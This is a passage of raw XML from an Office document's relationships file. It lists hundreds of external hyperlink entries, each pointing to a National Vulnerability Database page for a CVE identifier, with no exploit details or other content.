Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId1884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88055" TargetMode="External" Id="rId1885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-26961" TargetMode="External" Id="rId1886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-11831" TargetMode="External" Id="rId1887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64542" TargetMode="External" Id="rId1888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64584" TargetMode="External" Id="rId1889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64588" TargetMode="External" Id="rId1890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64589" TargetMode="External" Id="rId1891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64610" TargetMode="External" Id="rId1892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64618" TargetMode="External" Id="rId1893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64830" TargetMode="External" Id="rId1894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64838" TargetMode="External" Id="rId1895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64854" TargetMode="External" Id="rId1896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64866" TargetMode="External" Id="rId1897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64868" TargetMode="External" Id="rId1898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14565" TargetMode="External" Id="rId1899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16892" TargetMode="External" Id="rId1900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17274" TargetMode="External" Id="rId1901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17621" TargetMode="External" Id="rId1902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19135" TargetMode="External" Id="rId1903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19479" TargetMode="External" Id="rId1904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19612" TargetMode="External" Id="rId1905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19644" TargetMode="External" Id="rId1906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19713" TargetMode="External" Id="rId1907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21269" TargetMode="External" Id="rId1908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27222" TargetMode="External" Id="rId1909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27227" TargetMode="External" Id="rId1910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27238" TargetMode="External" Id="rId1911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27258" TargetMode="External" Id="rId1912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38725" TargetMode="External" Id="rId1913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38961" TargetMode="External" Id="rId1914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45694" TargetMode="External" Id="rId1915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47880" TargetMode="External" Id="rId1916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48483" TargetMode="External" Id="rId1917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54553" TargetMode="External" Id="rId1918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55779" TargetMode="External" Id="rId1919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62324" TargetMode="External" Id="rId1920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId1921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId1922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId1923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70610" TargetMode="External" Id="rId1924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70612" TargetMode="External" Id="rId1925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71356" TargetMode="External" Id="rId1926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71357" TargetMode="External" Id="rId1927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71388" TargetMode="External" Id="rId1928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71440" TargetMode="External" Id="rId1929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71565" TargetMode="External" Id="rId1930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71803" TargetMode="External" Id="rId1931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72626" TargetMode="External" Id="rId1932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72627" TargetMode="External" Id="rId1933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73250" TargetMode="External" Id="rId1934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId1935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73295" TargetMode="External" Id="rId1936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75629" TargetMode="External" Id="rId1937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75635" TargetMode="External" Id="rId1938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75636" TargetMode="External" Id="rId1939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75637" TargetMode="External" Id="rId1940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75639" TargetMode="External" Id="rId1941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75640" TargetMode="External" Id="rId1942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75642" TargetMode="External" Id="rId1943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75643" TargetMode="External" Id="rId1944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75644" TargetMode="External" Id="rId1945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75646" TargetMode="External" Id="rId1946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75647" TargetMode="External" Id="rId1947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75651" TargetMode="External" Id="rId1948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75652" TargetMode="External" Id="rId1949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75657" TargetMode="External" Id="rId1950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75659" TargetMode="External" Id="rId1951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75660" TargetMode="External" Id="rId1952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75661" TargetMode="External" Id="rId1953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75666" TargetMode="External" Id="rId1954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75667" TargetMode="External" Id="rId1955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75668" TargetMode="External" Id="rId1956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75669" TargetMode="External" Id="rId1957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75670" TargetMode="External" Id="rId1958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75671" TargetMode="External" Id="rId1959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75672" TargetMode="External" Id="rId1960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75674" TargetMode="External" Id="rId1961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75675" TargetMode="External" Id="rId1962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75677" TargetMode="External" Id="rId1963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75678" TargetMode="External" Id="rId1964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75679" TargetMode="External" Id="rId1965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75680" TargetMode="External" Id="rId1966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75681" TargetMode="External" Id="rId1967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75683" TargetMode="External" Id="rId1968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75685" TargetMode="External" Id="rId1969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75687" TargetMode="External" Id="rId1970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75690" TargetMode="External" Id="rId1971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75691" TargetMode="External" Id="rId1972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75692" TargetMode="External" Id="rId1973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75693" TargetMode="External" Id="rId1974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75694" TargetMode="External" Id="rId1975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75695" TargetMode="External" Id="rId1976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75696" TargetMode="External" Id="rId1977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75700" TargetMode="External" Id="rId1978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75701" TargetMode="External" Id="rId1979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75702" TargetMode="External" Id="rId1980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75704" TargetMode="External" Id="rId1981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75705" TargetMode="External" Id="rId1982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75706" TargetMode="External" Id="rId1983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75707" TargetMode="External" Id="rId1984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75708" TargetMode="External" Id="rId1985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75709" TargetMode="External" Id="rId1986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75710" TargetMode="External" Id="rId1987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75711" TargetMode="External" Id="rId1988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75712" TargetMode="External" Id="rId1989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75713" TargetMode="External" Id="rId1990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75714" TargetMode="External" Id="rId1991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75715" TargetMode="External" Id="rId1992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75716" TargetMode="External" Id="rId1993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75717" TargetMode="External" Id="rId1994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75718" TargetMode="External" Id="rId1995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75719" TargetMode="External" Id="rId1996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75720" TargetMode="External" Id="rId1997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75722" TargetMode="External" Id="rId1998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75724" TargetMode="External" Id="rId1999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75725" TargetMode="External" Id="rId2000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75727" TargetMode="External" Id="rId2001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75729" TargetMode="External" Id="rId2002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75730" TargetMode="External" Id="rId2003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75731" TargetMode="External" Id="rId2004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75733" TargetMode="External" Id="rId2005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75734" TargetMode="External" Id="rId2006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75735" TargetMode="External" Id="rId2007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75736" TargetMode="External" Id="rId2008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75737" TargetMode="External" Id="rId2009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75738" TargetMode="External" Id="rId2010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75739" TargetMode="External" Id="rId2011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75740" TargetMode="External" Id="rId2012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75741" TargetMode="External" Id="rId2013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75742" TargetMode="External" Id="rId2014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79418" TargetMode="External" Id="rId2015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79905" TargetMode="External" Id="rId2016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81890" TargetMode="External" Id="rId2017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82396" TargetMode="External" Id="rId2018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84371" TargetMode="External" Id="rId2019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId2020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87653" TargetMode="External" Id="rId2021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14350" TargetMode="External" Id="rId2022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16660" TargetMode="External" Id="rId2023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19032" TargetMode="External" Id="rId2024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19670" TargetMode="External" Id="rId2025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41606" TargetMode="External" Id="rId2026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42338" TargetMode="External" Id="rId2027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45292" TargetMode="External" Id="rId2028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId2029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48094" TargetMode="External" Id="rId2030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48796" TargetMode="External" Id="rId2031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49392" TargetMode="External" Id="rId2032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50159" TargetMode="External" Id="rId2033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54048" TargetMode="External" Id="rId2034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55619" TargetMode="External" Id="rId2035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55867" TargetMode="External" Id="rId2036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56704" TargetMode="External" Id="rId2037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61632" TargetMode="External" Id="rId2038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66778" TargetMode="External" Id="rId2039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69207" TargetMode="External" Id="rId2040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70466" TargetMode="External" Id="rId2041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70575" TargetMode="External" Id="rId2042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70607" TargetMode="External" Id="rId2043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71216" TargetMode="External" Id="rId2044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71408" TargetMode="External" Id="rId2045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71436" TargetMode="External" Id="rId2046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71439" TargetMode="External" Id="rId2047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71848" TargetMode="External" Id="rId2048" /><Relationship 